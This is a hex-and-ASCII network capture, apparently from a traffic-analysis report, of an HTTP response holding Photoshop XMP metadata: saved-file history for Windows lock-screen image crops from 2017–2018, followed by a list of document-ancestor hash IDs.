                                                                                                                                                                                    2023-01-05 07:58:10 UTC415INData Raw: 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 50 72 65 74 74 79 50 69 63 73 5c 46 61 6c 6c 32 30 31 36 5f 35 30 30 5f 42 61 74 63 68 32 5c 43 72 6f 70 73 5c 50 50 5f 51 34 2d 35 30 30 42 32 5f 43 61 62 6f 50 6f 6c 6f 6e 69 6f 52 6f 63 68 61 55 72 75 67 75 61 79 20 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 31 35 34 33 33 38 38 33 39 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 31 36 54 31 32 3a 34 36 3a 35 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20
                                                                                                                                                                                    Data Ascii: #x9;File C:\Users\v-lizagh\MS\Windows10\PrettyPics\Fall2016_500_Batch2\Crops\PP_Q4-500B2_CaboPolonioRochaUruguay _shutterstock_154338839_1920x1080.jpg saved&#xA;2017-03-16T12:46:53-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC
                                                                                                                                                                                    2023-01-05 07:58:10 UTC431INData Raw: 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 45 6d 70 6f 77 65 72 69 6e 67 54 6f 6f 6c 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 39 34 39 39 39 30 39 34 5f 31 39 32 30 78 31 30 38 30 36 46 30 41 30 30 41 37 43 32 43 42 33 46 45 43 32 34 41 33 44 44 42 34 31 44 41 30 45 30 39 30 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 31 38 54 31 31 3a 30 34 3a 31 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 69 63 72 6f 73 6f 66 74 5c 45 6d 70 6f 77 65 72 69 6e 67 43 6c 61 73 73 72 6f 6f 6d 54 6f 6f 6c 73 5c 43 48 4f 53 45 4e 5c 45 6d 70 6f 77 65 72 69 6e 67 54 6f
                                                                                                                                                                                    Data Ascii: be\Adobe Photoshop CC 2015.5\AutoRecover\_EmpoweringTools_GettyImages-94999094_1920x10806F0A00A7C2CB3FEC24A3DDB41DA0E090.psb saved&#xA;2017-04-18T11:04:15-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Microsoft\EmpoweringClassroomTools\CHOSEN\EmpoweringTo
                                                                                                                                                                                    2023-01-05 07:58:10 UTC447INData Raw: 74 74 79 49 6d 61 67 65 73 2d 36 35 34 35 38 34 39 38 38 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 31 54 31 35 3a 31 38 3a 34 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 4e 42 41 5c 4d 61 79 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 4e 42 41 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 35 39 31 35 38 37 30 30 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 31 54 31 35 3a 32 30 3a 30 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c
                                                                                                                                                                                    Data Ascii: ttyImages-654584988_1920x1080.jpg saved&#xA;2017-05-11T15:18:49-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\NBA\May\Chosen\Crops\MIT-NBA_GettyImages-659158700_1920x1080.jpg saved&#xA;2017-05-11T15:20:05-07:00&#x9;File C:\Users\v-lizagh\MS\
                                                                                                                                                                                    2023-01-05 07:58:10 UTC454INData Raw: 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 38 54 31 30 3a 30 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 4d 75 73 69 63 46 65 73 74 69 76 61 6c 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 4d 75 73 69 63 46 65 73 74 69 76 61 6c 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 39 34 34 30 34 32 36 31 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 38 54 31 30 3a 30 38 3a 31 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65
                                                                                                                                                                                    Data Ascii: b saved&#xA;2017-05-18T10:06-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\MusicFestival\Chosen\Crops\MIT-MusicFestival_GettyImages-594404261_1920x1080.jpg saved&#xA;2017-05-18T10:08:15-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscree
                                                                                                                                                                                    2023-01-05 07:58:10 UTC470INData Raw: 61 63 6b 54 6f 53 63 68 6f 6f 6c 5c 43 68 6f 73 65 6e 5c 4d 49 54 2d 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 39 37 34 31 38 32 35 38 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 31 54 31 33 3a 30 35 3a 33 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5c 43 68 6f 73 65 6e 5c 4d 49 54 2d 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 37 30 31 30 35 37 39 35 36 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 31
                                                                                                                                                                                    Data Ascii: ackToSchool\Chosen\MIT-BackToSchool_GettyImages-497418258_1920x1080.jpg saved&#xA;2017-07-11T13:05:32-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\BackToSchool\Chosen\MIT-BackToSchool_GettyImages-701057956_1920x1080.jpg saved&#xA;2017-07-11
                                                                                                                                                                                    2023-01-05 07:58:10 UTC486INData Raw: 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 30 30 31 46 34 37 39 32 30 44 35 46 34 31 44 38 35 43 33 30 44 45 36 34 33 44 46 35 42 35 37 39 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 33 31 54 32 32 3a 30 39 3a 33 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 30 32 54 31 35 3a 35 38 3a 33 31 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b
                                                                                                                                                                                    Data Ascii: 0x1080_Landscape001F47920D5F41D85C30DE643DF5B579.psb saved&#xA;2017-07-31T22:09:35-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1920x1080_Landscape.psd saved&#xA;2017-08-02T15:58:31-07:00&#x9;File Lockscreen_1920x1080_Landscape.psd opened&#xA;
                                                                                                                                                                                    2023-01-05 07:58:10 UTC494INData Raw: 3a 34 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 37 5c 43 72 6f 70 73 5c 4c 6f 63 6b 30 31 37 2d 42 37 5f 43 61 72 72 69 63 6b 41 52 65 64 65 49 72 65 6c 61 6e 64 5f 65 53 74 6f 63 6b 2d 34 30 30 31 2d 32 31 34 31 37 39 2d 30 31 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 32 38 54 31 35 3a 34 38 3a 32 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74
                                                                                                                                                                                    Data Ascii: :44-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock2017_Batch7\Crops\Lock017-B7_CarrickARedeIreland_eStock-4001-214179-01_1920x1080.jpg saved&#xA;2017-08-28T15:48:24-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Phot
                                                                                                                                                                                    2023-01-05 07:58:10 UTC510INData Raw: 6c 6c 6f 77 65 65 6e 5c 5f 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 48 61 6c 6c 6f 77 65 65 6e 5f 4f 66 66 73 65 74 5f 34 30 38 38 33 36 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 39 2d 32 38 54 31 37 3a 31 34 3a 34 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 48 61 6c 6c 6f 77 65 65 6e 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 48 61 6c 6c 6f 77 65 65 6e 5f 4f 66 66 73 65 74 5f 34 30 38 38 33 36 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 39 2d 32 38 54 31 37 3a 31 35 3a 31 34 2d 30 37 3a 30 30 26 23 78 39 3b
                                                                                                                                                                                    Data Ascii: lloween\_CHOSEN\Crops\Halloween_Offset_408836_1920x1080.jpg saved&#xA;2017-09-28T17:14:45-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\Halloween\Chosen\Crops\MIT-Halloween_Offset_408836_1920x1080.jpg saved&#xA;2017-09-28T17:15:14-07:00&#x9;
                                                                                                                                                                                    2023-01-05 07:58:10 UTC526INData Raw: 65 2d 52 65 61 63 71 75 69 73 69 74 69 6f 6e 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 33 38 33 37 38 39 36 34 34 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 31 2d 31 35 54 31 36 3a 31 35 3a 33 31 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4f 66 66 69 63 65 2d 52 65 61 63 71 75 69 73 69 74 69 6f 6e 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 33 36 30 37 38 36 37 32 35 5f 31 39 32 30 78 31 30 38 30 42 32 34 31 37 46 43 34 35 34 42 38 32 38 37 41 32 44 39 36 44 31 37 35 42 38 41
                                                                                                                                                                                    Data Ascii: e-Reacquisition_shutterstock_383789644_1920x1080.jpg saved&#xA;2017-11-15T16:15:31-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Office-Reacquisition_shutterstock_360786725_1920x1080B2417FC454B8287A2D96D175B8A
                                                                                                                                                                                    2023-01-05 07:58:10 UTC534INData Raw: 6d 61 67 65 73 2d 36 31 39 33 35 36 34 38 34 5f 31 39 32 30 78 31 30 38 30 44 30 42 39 30 36 39 46 38 30 30 37 42 45 37 34 45 37 30 41 36 45 45 39 36 41 35 30 37 35 45 46 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 30 34 54 31 31 3a 33 36 3a 32 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 57 69 6e 74 65 72 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 44 65 63 32 30 31 37 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 4d 49 54 2d 57 69 6e 74 65 72 45 6e 74 44 65 63 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 33 39 30 30 36 38 34 36 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41
                                                                                                                                                                                    Data Ascii: mages-619356484_1920x1080D0B9069F8007BE74E70A6EE96A5075EF.psb saved&#xA;2017-12-04T11:36:23-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\WinterEntertainment\Dec2017\Chosen\Crops\MIT-WinterEntDec_GettyImages-639006846_1920x1080.jpg saved&#xA
                                                                                                                                                                                    2023-01-05 07:58:10 UTC550INData Raw: 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 31 32 35 30 32 34 45 46 43 46 33 35 30 41 34 43 42 32 43 41 31 41 31 44 35 41 33 43 42 32 33 45 37 36 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 32 30 54 32 33 3a 33 38 3a 34 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 4e 46 4c 5c 44 65 63 32 30 31 37 2d 50 6f 73 74 53 65 61 73 6f 6e 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4d 49 54 2d 4e 46 4c 2d 50 6f 73 74 53 65 61 73 6f 6e 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 34 37 34 30 35 34 36 38 5f 31 39 32 30 78 31 30 38 30 2e 70 73 64 20 73 61 76 65 64
                                                                                                                                                                                    Data Ascii: Lockscreen_1920x1080_Landscape125024EFCF350A4CB2CA1A1D5A3CB23E76.psb saved&#xA;2017-12-20T23:38:43-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\NFL\Dec2017-PostSeason\CHOSEN\Crops\MIT-NFL-PostSeason_GettyImages-547405468_1920x1080.psd saved
                                                                                                                                                                                    2023-01-05 07:58:10 UTC566INData Raw: 69 6e 74 65 72 4f 6c 79 6d 70 69 63 73 5c 5f 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4d 49 54 2d 57 69 6e 74 65 72 4f 6c 79 6d 70 69 63 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 34 39 32 34 38 37 36 38 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 31 2d 33 31 54 31 33 3a 34 32 3a 33 36 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 57 69 6e 74 65 72 4f 6c 79 6d 70 69 63 73 5c 5f 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4d 49 54 2d 57 69 6e 74 65 72 4f 6c 79 6d 70 69 63 73 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 31 35 36 38 31 35 30 38 34 5f 31 39 32 30 78 31 30 38 30 2e 6a
                                                                                                                                                                                    Data Ascii: interOlympics\_CHOSEN\Crops\MIT-WinterOlympics_GettyImages-649248768_1920x1080.jpg saved&#xA;2018-01-31T13:42:36-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\WinterOlympics\_CHOSEN\Crops\MIT-WinterOlympics_shutterstock_156815084_1920x1080.j
                                                                                                                                                                                    2023-01-05 07:58:10 UTC590INData Raw: 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 31 35 54 31 35 3a 32 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 49 6e 74 6c 5f 48 6f 6d 65 77 6f 72 6b 41 69 64 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 30 38 31 32 39 36 31 38 5f 31 39 32 30 78 31 30 38 30 35 35 41 32 43 31 36 36 41 30 34 46 30 37 31 35 42 46 35 34 36 43 41 31 33 42 41 32 36 44 46 43 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 31 35 54 31 35 3a 33 38 3a 34 31 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a
                                                                                                                                                                                    Data Ascii: saved&#xA;2018-02-15T15:25-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_MIT-Intl_HomeworkAid_GettyImages-108129618_1920x108055A2C166A04F0715BF546CA13BA26DFC.psb saved&#xA;2018-02-15T15:38:41-08:00&#x9;File C:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC606INData Raw: 49 6d 61 67 65 73 2d 36 33 38 32 36 39 36 34 36 5f 31 39 32 30 78 31 30 38 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 32 31 54 31 36 3a 34 37 3a 30 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 39 32 30 78 31 30 38 30 5f 4c 61 6e 64 73 63 61 70 65 44 36 31 35 44 35 46 38 38 34 42 44 42 39 37 46 39 38 46 38 45 42 46 31 42 32 46 36 35 39 33 35 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 32 31 54 31 37 3a 30 33 3a 31 31 2d 30 37 3a 30 30
                                                                                                                                                                                    Data Ascii: Images-638269646_1920x1080.jpg saved&#xA;2018-03-21T16:47:05-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Lockscreen_1920x1080_LandscapeD615D5F884BDB97F98F8EBF1B2F65935.psb saved&#xA;2018-03-21T17:03:11-07:00
                                                                                                                                                                                    2023-01-05 07:58:10 UTC640INData Raw: 41 38 39 34 42 41 37 42 41 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 38 44 39 44 36 34 33 44 35 42 41 38 32 35 43 35 30 34 41 39 34 36 42 30 35 44 32 45 45 36 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 38 45 31 44 35 36 44 42 42 46 43 44 45 43 31 31 42 34 32 36 45 46 31 45 30 44 44 31 44 36 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 38 46 46 34 39 30 35 30 34 45 43 31 39 31 35 32 33 31 45 41 43 30 34 36 36 46 44 31 38 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 39 30 32 43 43 39 39 36 32 31 41 36 42 36 38 43 42 31 41 45 31 42 45 34 36 42 45 35 31 44 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 39 30 42 36 33 39 43 38 37 35 45 41 33 37 41 44 38 30 37 30 33 33 38 35 34 46
                                                                                                                                                                                    Data Ascii: A894BA7BA8</rdf:li> <rdf:li>08D9D643D5BA825C504A946B05D2EE63</rdf:li> <rdf:li>08E1D56DBBFCDEC11B426EF1E0DD1D67</rdf:li> <rdf:li>08FF490504EC1915231EAC0466FD1829</rdf:li> <rdf:li>0902CC99621A6B68CB1AE1BE46BE51DC</rdf:li> <rdf:li>090B639C875EA37AD807033854F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC663INData Raw: 43 42 30 30 43 36 38 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 45 41 46 39 39 32 32 31 37 36 45 30 32 44 44 37 35 35 31 38 31 33 34 37 42 35 32 44 33 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 45 45 33 33 43 35 43 39 33 38 42 31 30 30 41 35 39 30 45 37 31 36 42 35 32 46 46 35 35 36 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 45 46 35 30 43 37 46 34 42 39 39 35 32 36 34 36 33 36 31 41 31 36 34 37 34 42 41 35 41 33 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 45 46 35 44 39 31 30 43 42 41 31 36 37 37 44 44 34 36 36 35 42 42 30 33 46 45 42 46 41 45 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 45 46 46 39 32 43 30 31 37 39 34 41 42 36 44 34 32 44 45 41 35 33 37 35 37 43 31 44
                                                                                                                                                                                    Data Ascii: CB00C680</rdf:li> <rdf:li>0EAF9922176E02DD755181347B52D30C</rdf:li> <rdf:li>0EE33C5C938B100A590E716B52FF5564</rdf:li> <rdf:li>0EF50C7F4B9952646361A16474BA5A32</rdf:li> <rdf:li>0EF5D910CBA1677DD4665BB03FEBFAE9</rdf:li> <rdf:li>0EFF92C01794AB6D42DEA53757C1D
                                                                                                                                                                                    2023-01-05 07:58:10 UTC679INData Raw: 31 37 43 36 45 42 37 41 36 34 36 38 38 38 33 36 44 45 44 31 34 33 45 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 39 32 43 37 37 43 45 38 38 38 30 43 36 30 33 39 43 42 30 43 39 43 36 43 39 31 42 31 37 33 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 39 33 33 34 45 42 37 43 37 31 39 39 46 45 37 34 41 35 39 32 46 38 36 43 30 41 31 38 42 31 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 39 33 33 43 33 42 37 33 43 35 36 42 46 42 33 39 36 39 39 42 46 45 43 39 44 46 30 46 31 42 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 39 35 35 42 39 45 39 37 39 36 46 32 38 33 36 38 42 37 34 39 34 30 44 30 43 33 46 41 36 38 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 39 35 37 41 35 42 31 31 46 31 37 38
                                                                                                                                                                                    Data Ascii: 17C6EB7A64688836DED143E1</rdf:li> <rdf:li>192C77CE8880C6039CB0C9C6C91B173D</rdf:li> <rdf:li>19334EB7C7199FE74A592F86C0A18B1C</rdf:li> <rdf:li>1933C3B73C56BFB39699BFEC9DF0F1B6</rdf:li> <rdf:li>1955B9E9796F28368B74940D0C3FA685</rdf:li> <rdf:li>1957A5B11F178
                                                                                                                                                                                    2023-01-05 07:58:10 UTC695INData Raw: 32 32 42 45 39 34 34 31 45 30 35 35 32 31 43 31 41 35 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 36 42 32 42 39 33 36 31 34 37 39 41 42 38 38 45 44 35 39 45 46 30 46 39 43 32 32 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 36 46 37 31 35 42 43 45 30 31 37 36 45 41 43 38 32 32 41 34 35 36 38 35 33 43 39 42 41 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 36 46 42 32 30 44 35 42 44 39 39 35 41 37 38 38 35 31 42 31 41 37 35 38 45 42 45 36 44 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 37 31 41 41 33 41 45 35 44 31 31 39 37 31 44 41 37 30 39 46 38 36 46 33 41 44 39 32 43 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 37 34 32 38 30 41 42 34 44 32 37 42 43 43 33 43
                                                                                                                                                                                    Data Ascii: 22BE9441E05521C1A58</rdf:li> <rdf:li>256B2B9361479AB88ED59EF0F9C228D7</rdf:li> <rdf:li>256F715BCE0176EAC822A456853C9BA7</rdf:li> <rdf:li>256FB20D5BD995A78851B1A758EBE6D4</rdf:li> <rdf:li>2571AA3AE5D11971DA709F86F3AD92CD</rdf:li> <rdf:li>2574280AB4D27BCC3C
                                                                                                                                                                                    2023-01-05 07:58:10 UTC703INData Raw: 44 36 43 33 46 30 36 46 39 46 34 35 33 36 34 43 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 41 35 35 33 34 44 45 32 45 45 45 39 43 33 39 38 42 34 34 30 36 36 45 44 46 33 30 38 39 46 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 41 36 34 42 35 38 41 30 45 39 34 43 42 44 39 33 46 37 41 32 37 31 44 34 35 32 32 38 36 45 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 41 37 32 37 35 46 33 46 45 31 36 32 45 45 44 38 33 42 31 32 42 46 34 43 36 44 45 43 32 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 41 37 35 37 35 39 35 44 45 42 35 42 33 33 43 37 31 32 46 46 44 35 42 43 35 37 44 31 38 44 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 41 37 35 39 43 39 41 34 45 36 42 36 46 41 43 41 46 39 44
